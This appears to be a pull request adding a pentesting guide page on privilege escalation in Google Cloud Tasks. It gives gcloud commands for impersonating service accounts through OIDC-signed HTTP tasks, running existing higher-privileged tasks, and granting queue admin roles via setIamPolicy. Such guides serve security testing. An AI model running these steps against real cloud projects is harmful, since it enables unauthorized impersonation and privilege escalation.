### PR TITLE
grte-lambdasawa

### DIFF
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -107,6 +107,7 @@
     - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md)
     - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md)
     - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md)
+    - [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md)
     - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md)
       - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md)
     - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)

--- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md
@@ -1,0 +1,51 @@
+# GCP - Cloud Tasks Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Tasks
+
+### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs`
+
+An attacker with these permissions can **impersonate other service accounts** by creating tasks that execute with the specified service account's identity. This allows sending **authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions** services.
+
+```bash
+gcloud tasks create-http-task \
+  task-$(date '+%Y%m%d%H%M%S') \
+  --location us-central1 \
+  --queue <queue_name> \
+  --url 'https://<service_name>.us-central1.run.app' \
+  --method POST \
+  --header 'X-Hello: world' \
+  --body-content '{"hello":"world"}' \
+  --oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com
+```
+
+### `cloudtasks.tasks.run`, `cloudtasks.tasks.list`
+
+An attacker with these permissions can **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.
+
+```bash
+gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>
+```
+
+The principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.
+
+### `cloudtasks.queues.setIamPolicy`
+
+An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin` which includes the ability to create and run tasks.
+
+```bash
+gcloud tasks queues add-iam-policy-binding \
+  <queue_name> \
+  --location us-central1 \
+  --member serviceAccount:<account>@<project_id>.iam.gserviceaccount.com \
+  --role roles/cloudtasks.admin
+```
+
+This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.
+
+## References
+
+- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs)
+
+{{#include ../../../banners/hacktricks-training.md}}


### PR DESCRIPTION
Added documentation for privilege escalation techniques using Google Cloud Tasks service. Cloud Tasks is often compared to Pub/Sub and is widely used in modern applications.
Since we already have Pub/Sub coverage, it makes sense to include Tasks as well.

While the `actAs` and `setIamPolicy` examples are not particularly unique, they serve as useful copy-paste cheat sheets for penetration testers.
The `tasks.run` retry abuse has
limited exploitation scenarios, but it's worth documenting since it doesn't require particularly strong permissions.